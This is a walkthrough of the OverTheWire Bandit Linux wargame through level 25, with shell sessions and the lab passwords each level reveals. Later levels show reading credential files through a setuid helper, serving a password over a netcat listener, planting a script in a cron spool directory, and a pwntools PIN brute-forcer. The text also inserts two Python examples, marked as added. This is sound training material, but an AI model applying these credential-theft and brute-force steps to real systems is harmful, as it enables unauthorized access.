Bandit

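Research life is really tough, so I'm playing a little wargame to unwind.

References:

Challenge site

Bandit walkthrough log for the WarGame Linux practice platform

OverTheWire: Bandit walkthrough guide

OverTheWire: Bandit WriteUp (completed 2019.01.17)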

Level 0

Just connect over SSH.

Level 0 → Level 1

bandit0@bandit:~$ ls
readme
bandit0@bandit:~$ cat readme

Level 1 → Level 2

Log in as bandit1 with the password obtained in the previous level.

bandit1@bandit:~$ ls
-
bandit1@bandit:~$ cat ./-

Level 2 → Level 3

bandit2@bandit:~$ ls -alit
total 24
1514 drwxr-xr-x 70 root root 4096 Oct 5 06:20 ..
517590 drwxr-xr-x 2 root root 4096 Oct 5 06:19 .
517780 -rw-r----- 1 bandit3 bandit2 33 Oct 5 06:19 spaces in this filename
517593 -rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
517592 -rw-r--r-- 1 root root 3771 Jan 6 2022 .bashrc
517591 -rw-r--r-- 1 root root 807 Jan 6 2022 .profile
bandit2@bandit:~$ cat "spaces in this filename"
aBZ0W5EmUfAf7kHTQeOwd8bauFJ2lAiG

Level 3 → Level 4

bandit3@bandit:~$ ls -ali
total 24
517645 drwxr-xr-x 3 root root 4096 Oct 5 06:19 .
1514 drwxr-xr-x 70 root root 4096 Oct 5 06:20 ..
517648 -rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
517647 -rw-r--r-- 1 root root 3771 Jan 6 2022 .bashrc
517949 drwxr-xr-x 2 root root 4096 Oct 5 06:19 inhere
517646 -rw-r--r-- 1 root root 807 Jan 6 2022 .profile
bandit3@bandit:~$ cd inhere
bandit3@bandit:~/inhere$ ls
bandit3@bandit:~/inhere$ ls -ali
total 12
517949 drwxr-xr-x 2 root root 4096 Oct 5 06:19 .
517645 drwxr-xr-x 3 root root 4096 Oct 5 06:19 ..
517951 -rw-r----- 1 bandit4 bandit3 33 Oct 5 06:19 .hidden
bandit3@bandit:~/inhere$ cat .hidden
2EW7BBsr6aMMoJ2HjW067dm8EgX26xNe

Level 4 → Level 5

Solution 1

Brute force: read every file directly.

bandit4@bandit:~$ ls -alit
total 24
1514 drwxr-xr-x 70 root root 4096 Oct 5 06:20 ..
517972 drwxr-xr-x 2 root root 4096 Oct 5 06:19 inhere
517670 drwxr-xr-x 3 root root 4096 Oct 5 06:19 .
517673 -rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
517672 -rw-r--r-- 1 root root 3771 Jan 6 2022 .bashrc
517671 -rw-r--r-- 1 root root 807 Jan 6 2022 .profile
bandit4@bandit:~$ cd inhere
bandit4@bandit:~/inhere$ ls -ali
total 48
517972 drwxr-xr-x 2 root root 4096 Oct 5 06:19 .
517670 drwxr-xr-x 3 root root 4096 Oct 5 06:19 ..
517979 -rw-r----- 1 bandit5 bandit4 33 Oct 5 06:19 -file00
517984 -rw-r----- 1 bandit5 bandit4 33 Oct 5 06:19 -file01
517985 -rw-r----- 1 bandit5 bandit4 33 Oct 5 06:19 -file02
517987 -rw-r----- 1 bandit5 bandit4 33 Oct 5 06:19 -file03
517989 -rw-r----- 1 bandit5 bandit4 33 Oct 5 06:19 -file04
517994 -rw-r----- 1 bandit5 bandit4 33 Oct 5 06:19 -file05
517996 -rw-r----- 1 bandit5 bandit4 33 Oct 5 06:19 -file06
517997 -rw-r----- 1 bandit5 bandit4 33 Oct 5 06:19 -file07
518000 -rw-r----- 1 bandit5 bandit4 33 Oct 5 06:19 -file08
518001 -rw-r----- 1 bandit5 bandit4 33 Oct 5 06:19 -file09
bandit4@bandit:~/inhere$ cat ./-file00
QRrtZ¾iÿ H
|٩ȧɃ^¢bandit4@bandit:~/inhere$ cat ./-file01
7L3򙋍¯ Ŵ¬­݈Eș֜ ¯V&ꓨ¢Fµbandit4@bandit:~/inhere$ cat ./-file02
¬¬򋐌«ؠ\׭⃐Ոxז2¬Kbandit4@bandit:~/inhere$ cat ./-file03
ઃxݣeǾۚVO¸³p{¶ ³­ύUb4¿bandit4@bandit:~/inhere$ cat ./-file04
­gQ񉏥E}:Ƨ¾«j8󃻄�𺯢ebandit4@bandit:~/inhere$ cat ./-file05
S 0¯·]7󾜫¹ÿ񣌼´~bandit4@bandit:~/inhere$ cat ./-file06
G=1ٚCԐB׃΢
º阏°9ؽ5bandit4@bandit:~/inhere$ cat ./-file07
lrIWWI6bB37kxfiCQZqUdOIYfr6eEeqR
bandit4@bandit:~/inhere$ cat ./-file08
¹º댝~ë򷷢T笙Z$ᕙ¡
bandit4@bandit:~/inhere$ cat ./-file09
Z񜷶򒟴Ր¶£qܕ7¤𵁕/򮹘bandit4@bandit:~/inhere$

Solution 2

Use the file command to check the file types; given the hint "human-readable file", the target is the one of type ASCII text.

bandit4@bandit:~/inhere$ file ./-file*
./-file00: data
./-file01: data
./-file02: data
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data
bandit4@bandit:~/inhere$ cat ./-file07
lrIWWI6bB37kxfiCQZqUdOIYfr6eEeqR

Level 5 → Level 6

Just use find.

bandit5@bandit:~$ ls -ali
total 24
517675 drwxr-xr-x 3 root root 4096 Oct 5 06:19 .
1514 drwxr-xr-x 70 root root 4096 Oct 5 06:20 ..
517678 -rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
517677 -rw-r--r-- 1 root root 3771 Jan 6 2022 .bashrc
518002 drwxr-x--- 22 root bandit5 4096 Oct 5 06:19 inhere
517676 -rw-r--r-- 1 root root 807 Jan 6 2022 .profile
bandit5@bandit:~$ cd inhere/
bandit5@bandit:~/inhere$ ls -ali
total 88
518002 drwxr-x--- 22 root bandit5 4096 Oct 5 06:19 .
517675 drwxr-xr-x 3 root root 4096 Oct 5 06:19 ..
518003 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere00
518013 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere01
518024 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere02
518043 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere03
518053 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere04
518063 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere05
518073 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere06
518083 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere07
518093 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere08
518103 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere09
518113 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere10
518123 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere11
518133 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere12
518143 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere13
518153 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere14
518163 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere15
518173 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere16
518183 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere17
518193 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere18
518203 drwxr-x--- 2 root bandit5 4096 Oct 5 06:19 maybehere19
bandit5@bandit:~/inhere$ find ./ -type f -size 1033c
./maybehere07/.file2
bandit5@bandit:~/inhere$ cat ./maybehere07/.file2
P4L4vucdmLnm8I7Vl7jG1ApGSfjYKqJU

Level 6 → Level 7

Use find with the matching conditions; just remember to redirect the error output (explanation

bandit6@bandit:~$ ls
bandit6@bandit:~$ ls -ali
total 20
517680 drwxr-xr-x 2 root root 4096 Oct 5 06:19 .
1514 drwxr-xr-x 70 root root 4096 Oct 5 06:20 ..
517683 -rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
517682 -rw-r--r-- 1 root root 3771 Jan 6 2022 .bashrc
517681 -rw-r--r-- 1 root root 807 Jan 6 2022 .profile
bandit6@bandit:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null
/var/lib/dpkg/info/bandit7.password
bandit6@bandit:~$ cat /var/lib/dpkg/info/bandit7.password
z7WtoNQU2XfjmMtWA8u5rN4vzqu4v99S

Level 7 → Level 8

bandit7@bandit:~$ ls -alih
total 4.1M
517685 drwxr-xr-x 2 root root 4.0K Oct 5 06:19 .
1514 drwxr-xr-x 70 root root 4.0K Oct 5 06:20 ..
517688 -rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
517687 -rw-r--r-- 1 root root 3.7K Jan 6 2022 .bashrc
518216 -rw-r----- 1 bandit8 bandit7 4.0M Oct 5 06:19 data.txt
517686 -rw-r--r-- 1 root root 807 Jan 6 2022 .profile
bandit7@bandit:~$ du -sh data.txt
4.0M data.txt
bandit7@bandit:~$ cat data.txt | grep millionth
millionth TESKZC0XvTetK0S9xNwm25STk5iWrBvP

Level 8 → Level 9

The sort and uniq commands in Linux

bandit8@bandit:~$ ls -alih
total 56K
517690 drwxr-xr-x 2 root root 4.0K Oct 5 06:19 .
1514 drwxr-xr-x 70 root root 4.0K Oct 5 06:20 ..
517693 -rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
517692 -rw-r--r-- 1 root root 3.7K Jan 6 2022 .bashrc
518219 -rw-r----- 1 bandit9 bandit8 33K Oct 5 06:19 data.txt
517691 -rw-r--r-- 1 root root 807 Jan 6 2022 .profile
bandit8@bandit:~$ sort -n data.txt | uniq -u
EN632PlfYiZbn3PhVK3XOGSlNInNE00t

Level 9 → Level 10

bandit9@bandit:~$ ls -alih
total 40K
517695 drwxr-xr-x 2 root root 4.0K Oct 5 06:19 .
1514 drwxr-xr-x 70 root root 4.0K Oct 5 06:20 ..
517698 -rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
517697 -rw-r--r-- 1 root root 3.7K Jan 6 2022 .bashrc
517702 -rw-r----- 1 bandit10 bandit9 19K Oct 5 06:19 data.txt
517696 -rw-r--r-- 1 root root 807 Jan 6 2022 .profile
bandit9@bandit:~$ cat data.txt | strings | grep =
=2""L(
x]T========== theG)"
========== passwordk^
Y=xW
t%=q
========== is
4=}D3
{1\=
FC&=z
=Y!m
$/2`)=Y
4_Q=\
MO=(
?=|J
WX=DA
{TbJ;=l
[=lI
========== G7w8LIi6J3kTb8A7j9LgrywtEUlyyp6s
>8=6
=r=_
=uea
zl=4

Level 10 → Level 11

bandit10@bandit:~$ ls -alih
total 24K
517540 drwxr-xr-x 2 root root 4.0K Oct 5 06:19 .
1514 drwxr-xr-x 70 root root 4.0K Oct 5 06:20 ..
517543 -rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
517542 -rw-r--r-- 1 root root 3.7K Jan 6 2022 .bashrc
517703 -rw-r----- 1 bandit11 bandit10 69 Oct 5 06:19 data.txt
517541 -rw-r--r-- 1 root root 807 Jan 6 2022 .profile
bandit10@bandit:~$ base64 -d data.txt
The password is 6zPeziLdR2RKNdNYFNb6nVCKzphlXHBM

Level 11 → Level 12

bandit11@bandit:~$ ls -alih
total 24K
517545 drwxr-xr-x 2 root root 4.0K Oct 5 06:19 .
1514 drwxr-xr-x 70 root root 4.0K Oct 5 06:20 ..
517548 -rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
517547 -rw-r--r-- 1 root root 3.7K Jan 6 2022 .bashrc
517704 -rw-r----- 1 bandit12 bandit11 49 Oct 5 06:19 data.txt
517546 -rw-r--r-- 1 root root 807 Jan 6 2022 .profile
bandit11@bandit:~$ cat data.txt
Gur cnffjbeq vf WIAOOSFzMjXXBC0KoSKBbJ8puQm5lIEi
bandit11@bandit:~$ cat data.txt | tr 'a-zA-Z' 'n-za-mN-ZA-M'
The password is JVNBBFSmZwKKOP0XbFXOoW8chDz5yVRv
bandit11@bandit:~$ cat data.txt | tr [a-zA-Z] [n-za-mN-ZA-M]
The password is JVNBBFSmZwKKOP0XbFXOoW8chDz5yVRv
bandit11@bandit:~$ cat data.txt | tr a-zA-Z n-za-mN-ZA-M
The password is JVNBBFSmZwKKOP0XbFXOoW8chDz5yVRv

Level 12 → Level 13

bandit12@bandit:~$ mkdir /tmp/evo1
bandit12@bandit:~$ cp data.txt /tmp/evo1/
bandit12@bandit:~$ cd /tmp/evo1
bandit12@bandit:/tmp/evo1$ ls -ali
total 408
303152 drwxrwxr-x 2 bandit12 bandit12 4096 Mar 22 17:10 .
1554 drwxrwx-wt 248 root root 405504 Mar 22 17:10 ..
303195 -rw-r----- 1 bandit12 bandit12 2582 Mar 22 17:10 data.txt
bandit12@bandit:/tmp/evo1$ file data.txt
data.txt: ASCII text
bandit12@bandit:/tmp/evo1$ xxd -r data.txt data.bin
bandit12@bandit:/tmp/evo1$ ls
data.bin data.txt
bandit12@bandit:/tmp/evo1$ file data.bin
data.bin: gzip compressed data, was "data2.bin", last modified: Thu Oct 5 06:19:20 2023, max compression, from Unix, original size modulo 2^32 573
bandit12@bandit:/tmp/evo1$ mv data.bin data.gz
bandit12@bandit:/tmp/evo1$ ls
data.gz data.txt
bandit12@bandit:/tmp/evo1$ gzip -d data.gz
bandit12@bandit:/tmp/evo1$ ls
data data.txt
bandit12@bandit:/tmp/evo1$ file data
data: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/evo1$ mv data data.bz2
bandit12@bandit:/tmp/evo1$ ls
data.bz2 data.txt
bandit12@bandit:/tmp/evo1$ bzip2 -d data.bz2
bandit12@bandit:/tmp/evo1$ ls
data data.txt
bandit12@bandit:/tmp/evo1$ file data
data: gzip compressed data, was "data4.bin", last modified: Thu Oct 5 06:19:20 2023, max compression, from Unix, original size modulo 2^32 20480
bandit12@bandit:/tmp/evo1$ mv data data.gz
bandit12@bandit:/tmp/evo1$ gzip -d data.gz
bandit12@bandit:/tmp/evo1$ ls
data data.txt
bandit12@bandit:/tmp/evo1$ file data
data: POSIX tar archive (GNU)
bandit12@bandit:/tmp/evo1$ mv data data.tar
bandit12@bandit:/tmp/evo1$ tar -xvf data.tar
data5.bin
bandit12@bandit:/tmp/evo1$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@bandit:/tmp/evo1$ mv data5.bin data5.tar
bandit12@bandit:/tmp/evo1$ tar -xvf data5.tar
data6.bin
bandit12@bandit:/tmp/evo1$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/evo1$ mv data6.bin data6.bz2
bandit12@bandit:/tmp/evo1$ bzip2 -d data6.bz2
bandit12@bandit:/tmp/evo1$ ls
data5.tar data6 data.tar data.txt
bandit12@bandit:/tmp/evo1$ file data6
data6: POSIX tar archive (GNU)
bandit12@bandit:/tmp/evo1$ mv data6 data6.tar
bandit12@bandit:/tmp/evo1$ tar -xvf data6.tar
data8.bin
bandit12@bandit:/tmp/evo1$ file data8.bin
data8.bin: gzip compressed data, was "data9.bin", last modified: Thu Oct 5 06:19:20 2023, max compression, from Unix, original size modulo 2^32 49
bandit12@bandit:/tmp/evo1$ mv data8.bin data8.gz
bandit12@bandit:/tmp/evo1$ gzip -d data8.gz
bandit12@bandit:/tmp/evo1$ ls
data5.tar data6.tar data8 data.tar data.txt
bandit12@bandit:/tmp/evo1$ file data8
data8: ASCII text
bandit12@bandit:/tmp/evo1$ cat data8
The password is wbWdlBxEir4CaE8LaPhauuOo6pwRmrDw
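
The file / rename / decompress loop above, automated by magic-byte detection, as an added example that is not part of the original writeup. The function names, the size and depth limits, and the sample built by build_sample are constructed here; each layer is peeled in memory with a cap, so a hostile archive can neither write to disk nor expand without bound.

```python
import bz2
import gzip
import io
import re
import tarfile

MAX_LAYERS = 32               # refuse pathological nesting
MAX_SIZE = 16 * 1024 * 1024   # refuse any layer that expands past 16 MiB


def identify(blob):
    """Classify a blob by its magic bytes, as `file` does in the transcript."""
    if blob[:2] == b"\x1f\x8b":
        return "gzip"
    if blob[:3] == b"BZh":
        return "bzip2"
    if blob[257:262] == b"ustar":
        return "tar"
    if re.match(rb"[0-9a-f]{8}: [0-9a-f]{2}", blob):
        return "hexdump"
    return "payload"


def xxd_reverse(text):
    """Like `xxd -r`: rebuild bytes from 'offset: hex groups  ascii' lines."""
    out = bytearray()
    for line in text.splitlines():
        if b":" in line:
            hex_part = line.split(b":", 1)[1].split(b"  ", 1)[0]
            out += bytes.fromhex(hex_part.decode("ascii"))
    return bytes(out)


def peel(blob, kind):
    """Remove one layer in memory; nothing is written to disk."""
    if kind == "gzip":
        data = gzip.GzipFile(fileobj=io.BytesIO(blob)).read(MAX_SIZE + 1)
    elif kind == "bzip2":
        data = bz2.BZ2Decompressor().decompress(blob, MAX_SIZE + 1)
    elif kind == "tar":
        with tarfile.open(fileobj=io.BytesIO(blob)) as tar:
            files = [m for m in tar.getmembers() if m.isfile()]
            if len(files) != 1:
                raise ValueError("expected exactly one regular file in the archive")
            data = tar.extractfile(files[0]).read(MAX_SIZE + 1)
    else:
        data = xxd_reverse(blob)
    if len(data) > MAX_SIZE:
        raise ValueError(kind + " layer expands past MAX_SIZE")
    return data


def unwrap(blob):
    """Peel layers until no known magic matches; return (layer names, payload)."""
    layers = []
    for _ in range(MAX_LAYERS):
        kind = identify(blob)
        if kind == "payload":
            return layers, blob
        layers.append(kind)
        blob = peel(blob, kind)
    raise ValueError("more than MAX_LAYERS nested layers")


def xxd_dump(data):
    """Emit xxd-style text (ASCII column left as dots); builds the sample only."""
    rows = []
    for off in range(0, len(data), 16):
        hexs = data[off:off + 16].hex()
        groups = " ".join(hexs[i:i + 4] for i in range(0, len(hexs), 4))
        rows.append("%08x: %-39s  %s\n" % (off, groups, "." * (len(hexs) // 2)))
    return "".join(rows).encode("ascii")


def tar_of(name, data):
    """Wrap data in a one-member tar; builds the sample only."""
    buf, info = io.BytesIO(), tarfile.TarInfo(name)
    info.size = len(data)
    with tarfile.open(fileobj=buf, mode="w") as tar:
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_sample(secret):
    """Constructed input with the layer order seen in the transcript."""
    blob = tar_of("data8.bin", gzip.compress(secret))
    blob = tar_of("data5.bin", tar_of("data6.bin", bz2.compress(blob)))
    return xxd_dump(gzip.compress(bz2.compress(gzip.compress(blob))))
```

To run it on a real file, pass the file's bytes, for example unwrap(open('data.txt', 'rb').read()).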

Level 13 → Level 14

bandit13@bandit:~$ ssh -i sshkey.private bandit14@localhost -p2220
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
fGrHPx402xGC7U7rXKDaxiWFTOiF0ENq

Level 14 → Level 15

bandit14@bandit:~$ telnet localhost 30000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
fGrHPx402xGC7U7rXKDaxiWFTOiF0ENq
Correct!
jN2kgmIXJ6fShzhT2avhotn4Zcka6tnt

Connection closed by foreign host.

Level 15 → Level 16

bandit15@bandit:~$ openssl s_client -connect localhost:30001
...output omitted here...
read R BLOCK
jN2kgmIXJ6fShzhT2avhotn4Zcka6tnt
Correct!
JQttfApK4SeyHwDlI9SXGR50qclOAil1

closed

Level 16 → Level 17

bandit16@bandit:~$ nmap -sV localhost -p 31000-32000
...output omitted here...
PORT STATE SERVICE VERSION
31046/tcp open echo
31518/tcp open ssl/echo
31691/tcp open echo
31790/tcp open ssl/unknown
31960/tcp open echo
...output omitted here...
bandit16@bandit:~$ openssl s_client -connect localhost:31790
...output omitted here...
read R BLOCK
JQttfApK4SeyHwDlI9SXGR50qclOAil1
Correct!
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

closed

Save this key locally as 17.key, then log in with XShell using the Public Key authentication method.

For reference, here is the password for level 17:

bandit17@bandit:~$ cat /etc/bandit_pass/bandit17
VwOSWtCA7lRKkTfbr2IDh6awj9RNZM5e

Level 17 → Level 18

Run diff; the line from the new file is the real password.

bandit17@bandit:~$ ls
passwords.new passwords.old
bandit17@bandit:~$ diff passwords.new passwords.old
42c42
< hga5tuuCLF6fFzUpnagiMN8ssu9LFrdg
---
> p6ggwdNHncnmCNxuAt0KtKVq185ZU7AW

Level 18 → Level 19

C:\Users\Evolution>ssh -p 2220 bandit18@bandit.labs.overthewire.org ls
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|


This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames

bandit18@bandit.labs.overthewire.org's password:
readme

C:\Users\Evolution>ssh -p 2220 bandit18@bandit.labs.overthewire.org cat readme
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|


This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames

bandit18@bandit.labs.overthewire.org's password:
awhqfNnAbc1naukrpqDYcF95h7HoMTrC

Level 19 → Level 20

bandit19@bandit:~$ ll
total 36
drwxr-xr-x 2 root root 4096 Oct 5 06:19 ./
drwxr-xr-x 70 root root 4096 Oct 5 06:20 ../
-rwsr-x--- 1 bandit20 bandit19 14876 Oct 5 06:19 bandit20-do*
-rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 root root 3771 Jan 6 2022 .bashrc
-rw-r--r-- 1 root root 807 Jan 6 2022 .profile
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
VxCazJaVykI6W36BkBU0mJTCM8rR95XT

Level 20 → Level 21

Serve the password on a fixed port and let suconnect connect to it; & runs the command in the background.

bandit20@bandit:~$ ll
total 36
drwxr-xr-x 2 root root 4096 Oct 5 06:19 ./
drwxr-xr-x 70 root root 4096 Oct 5 06:20 ../
-rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 root root 3771 Jan 6 2022 .bashrc
-rw-r--r-- 1 root root 807 Jan 6 2022 .profile
-rwsr-x--- 1 bandit21 bandit20 15600 Oct 5 06:19 suconnect*
bandit20@bandit:~$ cat /etc/bandit_pass/bandit20
VxCazJaVykI6W36BkBU0mJTCM8rR95XT
bandit20@bandit:~$ cat /etc/bandit_pass/bandit20 | nc -l -p 12345 &
[1] 2176985
bandit20@bandit:~$ ./suconnect 12345
Read: VxCazJaVykI6W36BkBU0mJTCM8rR95XT
Password matches, sending next password
NvEJF7oVjkddltPSrdKEFOllh9V1IBcq
[1]+ Done cat /etc/bandit_pass/bandit20 | nc -l -p 12345
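
The exchange in this level with both roles modelled in one process, as an added example that is not part of the original writeup and is not the real suconnect. The function names, the kernel-assigned loopback port and the mismatch wording are assumptions; the two log strings on a match are the ones shown in the transcript above, and all secrets are constructed.

```python
import hmac
import socket
import threading


def serve_secret(srv, secret, received):
    """Role of `cat file | nc -l -p PORT`: send the secret to the first client
    that connects, then record whatever that client sends back."""
    conn, _ = srv.accept()
    with conn, conn.makefile("rb") as reader:
        conn.sendall(secret + b"\n")
        received.append(reader.readline().strip())


def checker_connect(port, expected, next_secret):
    """Role of the setuid helper: connect, read one line, compare it with the
    expected value, and send the next secret only on a match."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as sock, \
            sock.makefile("rb") as reader:
        got = reader.readline().strip()
        log = ["Read: " + got.decode("ascii", "replace")]
        if hmac.compare_digest(got, expected):      # constant-time comparison
            log.append("Password matches, sending next password")
            sock.sendall(next_secret + b"\n")
        else:
            log.append("mismatch, sending nothing")  # wording is an assumption
    return log


def run_exchange(offered, expected, next_secret):
    """Run both roles over loopback; return (checker log, listener's reply)."""
    received = []
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind(("127.0.0.1", 0))   # loopback only, kernel-assigned port
        srv.listen(1)
        srv.settimeout(5)            # do not wait forever for a client
        port = srv.getsockname()[1]
        worker = threading.Thread(target=serve_secret,
                                  args=(srv, offered, received))
        worker.start()
        log = checker_connect(port, expected, next_secret)
        worker.join(timeout=5)
    return log, (received[0] if received else None)


if __name__ == "__main__":
    print(run_exchange(b"current-CONSTRUCTED", b"current-CONSTRUCTED",
                       b"next-CONSTRUCTED"))
```

A listener like this hands the secret to whichever local process connects first, so on a shared host it should stay bound to loopback and accept a single connection.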

Level 21 → Level 22

bandit21@bandit:~$ cd /etc/cron.d/
bandit21@bandit:/etc/cron.d$ ll
total 56
drwxr-xr-x 2 root root 4096 Oct 5 06:20 ./
drwxr-xr-x 106 root root 12288 Oct 5 06:20 ../
-rw-r--r-- 1 root root 62 Oct 5 06:19 cronjob_bandit15_root
-rw-r--r-- 1 root root 62 Oct 5 06:19 cronjob_bandit17_root
-rw-r--r-- 1 root root 120 Oct 5 06:19 cronjob_bandit22
-rw-r--r-- 1 root root 122 Oct 5 06:19 cronjob_bandit23
-rw-r--r-- 1 root root 120 Oct 5 06:19 cronjob_bandit24
-rw-r--r-- 1 root root 62 Oct 5 06:19 cronjob_bandit25_root
-rw-r--r-- 1 root root 201 Jan 8 2022 e2scrub_all
-rwx------ 1 root root 52 Oct 5 06:20 otw-tmp-dir*
-rw-r--r-- 1 root root 102 Mar 23 2022 .placeholder
-rw-r--r-- 1 root root 396 Feb 2 2021 sysstat
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff

Level 22 → Level 23

bandit22@bandit:~$ cd /etc/cron.d/
bandit22@bandit:/etc/cron.d$ ll
total 56
drwxr-xr-x 2 root root 4096 Oct 5 06:20 ./
drwxr-xr-x 106 root root 12288 Oct 5 06:20 ../
-rw-r--r-- 1 root root 62 Oct 5 06:19 cronjob_bandit15_root
-rw-r--r-- 1 root root 62 Oct 5 06:19 cronjob_bandit17_root
-rw-r--r-- 1 root root 120 Oct 5 06:19 cronjob_bandit22
-rw-r--r-- 1 root root 122 Oct 5 06:19 cronjob_bandit23
-rw-r--r-- 1 root root 120 Oct 5 06:19 cronjob_bandit24
-rw-r--r-- 1 root root 62 Oct 5 06:19 cronjob_bandit25_root
-rw-r--r-- 1 root root 201 Jan 8 2022 e2scrub_all
-rwx------ 1 root root 52 Oct 5 06:20 otw-tmp-dir*
-rw-r--r-- 1 root root 102 Mar 23 2022 .placeholder
-rw-r--r-- 1 root root 396 Feb 2 2021 sysstat
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:/etc/cron.d$ whoami
bandit22
bandit22@bandit:/etc/cron.d$ cat /tmp/$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G

Level 23 → Level 24

In the directory whose scripts get executed, write a script that reads out the password; remember to make it executable.

bandit23@bandit:~$ cd /var/spool/bandit24/foo
bandit23@bandit:/var/spool/bandit24/foo$ vim getpass.sh
bandit23@bandit:/var/spool/bandit24/foo$ cat getpass.sh
#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/bandit24pass
bandit23@bandit:/var/spool/bandit24/foo$ chmod +x getpass.sh
bandit23@bandit:/var/spool/bandit24/foo$ cat getpass.sh
#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/bandit24pass
bandit23@bandit:/var/spool/bandit24/foo$ cat getpass.sh
cat: getpass.sh: No such file or directory
bandit23@bandit:/var/spool/bandit24/foo$ cat /tmp/bandit24pass
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar

Level 24 → Level 25

Create this file under /tmp and run it.

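from pwn import *

# Connect to the PIN checker listening on localhost:30002
conn = remote('localhost', 30002)
conn.recvline()  # discard the greeting line
# Try every 4-digit PIN from 0000 to 9999 over the same connection
for i in range(10000):
    tmp = str(i).zfill(4)
    print('[+]Try PinCode: ' + str(tmp))
    conn.sendline(bytes('VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar ' + tmp, encoding='utf-8'))
    response = conn.recvline()
    print(response)
    # Any reply without "Wrong" means the PIN was accepted
    if "Wrong" not in str(response, encoding='utf-8'):
        print("[*]Pincode: " + str(tmp))
        print(conn.recvall())
        exit(0)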

This finally yields the password:

[+]Try PinCode: 9014
b'Wrong! Please enter the correct pincode. Try again.\n'
[+]Try PinCode: 9015
b'Correct!\n'
[*]Pincode: 9015
[+] Receiving all data: Done (76B)
[*] Closed connection to localhost port 30002
b'The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d\n\nExiting.\n'

Level 25 → Level 26

bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost
kex_exchange_identification: Connection closed by remote host
